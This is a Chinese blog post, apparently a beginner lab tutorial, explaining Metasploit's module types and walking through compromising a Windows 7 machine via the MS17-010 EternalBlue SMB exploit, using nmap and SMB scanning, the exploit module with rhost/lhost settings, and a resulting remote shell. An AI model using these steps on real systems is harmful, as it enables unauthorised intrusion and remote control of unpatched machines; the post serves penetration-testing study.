Metasploit入侵win7

最新推荐文章于 2024-01-04 08:00:00 发布
最新推荐文章于 2024-01-04 08:00:00 发布
阅读量1.7k 收藏 30
点赞数 4
分类专栏: Metasploit 文章标签: Metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53030229/article/details/121188795
版权

文章目录

一、Metasploit是什么?

这里我简单介绍一下,方便你们小白了解(大佬直接跳过就行)
Metasploit框架是一个开源工具,旨在方便渗透测试,他是有ruby程序语言编写的模板化框架,具有很好的扩展性,便于渗透测试人员开发,使用定制的工具模板。Metasploit可向后端模块提供多种用来控制测试的接口。Metasploit还有第三方接口,如nmap、SQLMap,可以直接在控制台使用。

1、Auxiliaries(辅助模块)

该模块主要作用是扫描、嗅探、指纹识别辅佐渗透。

2、Exploit(渗透攻击模块)

该模块里面包含许多类型模块,渗透测试者利用这些模块多漏洞进行利用

3、payload(攻击载荷模块)

该模块用于渗透攻击成功之后,在目标系统执行任意命令或者执行特点代码,总结来说就是建立目标机与攻击机稳定连接,可返回shell或进行注入

4、Post(后期渗透模块)

该模块主要用于在获取目标系统远程控制权后,进行一系列的后渗透攻击动作,如获取敏感信息、实施跳板攻击。

5、Encoder(编码工具模块)

该工具在渗透测试中负责免杀,以防止被杀毒软件、防火墙、IDS及类似的安全软件检测出来

二、Metasploit入侵步骤

1.准备

1、首先你要确定两台主机在同一网段,并且能够ping通,这些我就不做演示了
2、更新软件
apt-get update
apt-get upgrade

3、msfconsole:打开metasploit

2.扫描端口

1、直接在metasploit框架里使用nmap扫描端口

你们也可以使用模块进行扫描

nmap -p 1-65535 -Pn 192.168.0.1
在这里插入图片描述
在这里插入图片描述

3、查看版本

1、search scanner/smb/smb_
在这里插入图片描述2、use 7 -->show options -->set rhosts 192.168.0.1 -->run
在这里插入图片描述

4、查找对应利用漏洞模块

1、search exploit/windows/smb/
在这里插入图片描述
2、use exploit/windows/smb/ms17_010_eternalblue-->set rhost靶机ip-->set lhost 攻击机ip
我不知道你们这里的payload是不是主动配置的或者加上去的,我这由于以前玩过,不太清楚,如果不是或有问题请告知。

在这里插入图片描述
在这里插入图片描述

3、这里我们就成功了
在这里插入图片描述

5、shell

到了这一步就随便你们怎么玩了!
shell --> chcp 65001
在这里插入图片描述

在这里插入图片描述
注:如果我这里讲的有哪里不太详细、遗漏或错误,请及时告知。Thanks♪(・ω・)ノ!

ter_ret
关注
  • 4
    点赞
  • 30
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第7章渗透攻击 使用Metasploit对操作系统发起攻击
qq_69351815的博客
06-10 380
渗透测试是一种有目的性的、针对目标机构计算机系统安全的检测评估方法。渗透测试可以发现系统的漏洞和安全机制方面的隐患,并以此进行渗透攻击来取得目标计算机的控制权。Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。
Msf攻击Win7
07-09
Msf攻击Win7 metasploit
metasploitframework-win-x64
10-05
Metasploit Framework 作为一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台。它集成了各平台上常见的溢出漏洞和流行的shellcode,并且不断更新,使得缓冲区溢出测试变得方便和简单。 使用Metasploit安全测试工具在渗透测试中可以做很多事情,你可以保存你的日志、甚至定义每个有效负载在运行完成之后是如何将其自身清除的。值得一提的是这个强大的工具是免费的,它的开发团队由两个全职成员和少数兼职的投稿者组成,Metasploit Framework由最初的1.0版发展到现在的3.0版的漏洞自动化探测,成绩骄人,精神可嘉!
《网络攻击与防御》ms17-010漏洞(3)
CSDNfengwang的博客
11-08 2599
理解Windows操作系统的安全体系结构与机制,掌握Windows远程安全攻防技术,掌握Windows操作系统网络服务漏洞攻击过程,并学习如何利用metasploit对Windows操作系统进行简单的攻击及提权。利用meterpreter中的Webcan_stream获取Windows 7的摄像头画面(需事先将笔记本摄像头连接至虚拟机Win7上)利用msf框架中的ms17_010_eternalblue脚本攻击Windows 7。└─# msfdb init //初始化。打开metasploit
利用MS11_003 IE漏洞攻击Windows7主机-代号 永恒之蓝
君逍遥o
11-27 718
kali 虚拟攻击测试;Windows7-永恒之蓝漏洞攻击
简单到有手就行!!!Kali msf打win7永恒之蓝漏洞
weixin_54475173的博客
01-04 652
kali msf 打windows7 永恒之蓝
metasploit攻击win7
dkpower111的博客
03-27 310
本实验使用到的工具为nessus 、win7\kali 首先。获得靶机ip(10.1.1.129) 关闭win7防火墙 攻击开始: 在Kali上启动nussus服务(/etc/init.d/nessusd start) 访问Nessus控制端https://127.0.0.1:8834/ 使用nusses的作用是对靶机进行扫描,寻找它可以利用的漏洞 新建一个扫描,依次选择“New Scan”-“Basic Network Scan” 配置扫描信息,主要设置扫描名称、描述和扫描目标三个信息即可,其他配置选
Metasploit内网安全渗透win7
m0_65364832的博客
01-16 1374
在Kali Linux中使用Metasploit通过ms17_010(永恒之蓝)对同一局域网下的主机的445端口和139端口进行内网渗透测试。通过实践操作,了解渗透测试基本过程。
Metasploit利用永恒之蓝漏洞攻击WIN7靶机
lin__ying的博客
11-21 203
8.指定攻击载荷,以控制受攻击的目标系统并通过已经设置的漏洞利用模块或有效负载来攻击目标系统。9.进入到了win7系统并得到了最高权限,用chcp 65001修改编码。7.显示可用的攻击载荷(payloads)以及其详细信息。3.显示当前选定模块的可用选项及其当前设置的值。4.指定攻击目标的远程主机的 IP 地址。1.进入msfconsole。6.退出该模块,进入攻击模块。查看win10 IP地址。
Metasploit攻击win7实例
qq_45768092的博客
10-23 2055
Metasploit攻击win7实例 本实验主要介绍了metasploit攻击win7的过程,通过本实验的学习,你能够了解kali下Nessus漏洞扫描工具的安装,掌握利用Nessus扫描目标主机,学会使用metasploitwin7系统的攻击。 实验简介 实验所属系列: 安全工具使用 实验对象:本科/专科信息安全专业 相关课程及专业: linux基础、网络安全 实验类别: 实践实验类 预备知识 Nessus基本介绍 Nessus是一个功能强大而又易于使用的网络和主机漏洞评估工具,分为免费的家庭版和付费的
metasploit怎么渗透windows7
weixin_42576410的博客
02-14 193
Metasploit 是一款开源的渗透测试工具,可以用来检测和利用操作系统和应用程序的漏洞。如果您想渗透 Windows 7 系统,您可以按照以下步骤操作: 安装 Metasploit:您可以从 Metasploit 官方网站下载安装包进行安装。 启动 Metasploit:在 Windows 下您可以打开命令提示符,输入 msfconsole 启动 Metasploit。 选择目标:您需要...
Metasploit简单利用及入侵Windows7案例.docx
11-13
Metasploit 入门---漏洞利用实验,攻击机系统:kali linux虚拟机。本文选择MS17_010漏洞(永恒之蓝)和MS08-067漏洞利用来尝试入侵Windows7虚拟机系统,目标机系统:Windows7 x64虚拟机。
使用Metasploit入侵windows之自动扫描
08-07
Metasploit入侵windows之自动扫描方法
metasploit 入侵测试手册
06-19
metasploit penetration testing cookbook
杭州电子科技大学数据结构(题目).pdf
04-26
杭州电子科技大学,期末考试资料,计算机专业期末考试试卷,试卷及答案,数据结构。
重庆大学 2010-2011(一)模拟电子技术A卷答案.pdf
最新发布
04-26
重庆大学期末考试试卷,重大期末考试试题,试题及答案
如何创意年会组织形式?.docx
04-26
年会班会资料,节目策划,游戏策划,策划案,策划方案,活动方案,筹办,公司年会,开场白,主持人,策划主题,主持词,小游戏。
基于Django框架的博客系统.zip
04-26
基于Django框架的博客系统.zip
【基于Springboot+Vue的Java毕业设计】校园服务平台项目实战(源码+录像演示+说明).rar
04-26
【基于Springboot+Vue的Java毕业设计】校园服务平台项目实战(源码+录像演示+说明).rar 【项目技术】 开发语言:Java 框架:Spingboot+vue 架构:B/S 数据库:mysql 【演示视频-编号:321】 https://pan.quark.cn/s/8dea014f4d36 【实现功能】 系统可以提供信息显示和相应服务,其管理员增删改查接单员和接单员资料,审核接单员预订订单,查看订单评价和评分,通过留言功能回复用户提问。
metasploit 木马 win10
08-12
- *3* [2021-05-07 使用metasploit(MSF) 和 木马 入侵win10 虚拟机](https://blog.csdn.net/White_give_boy/article/details/116477691)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值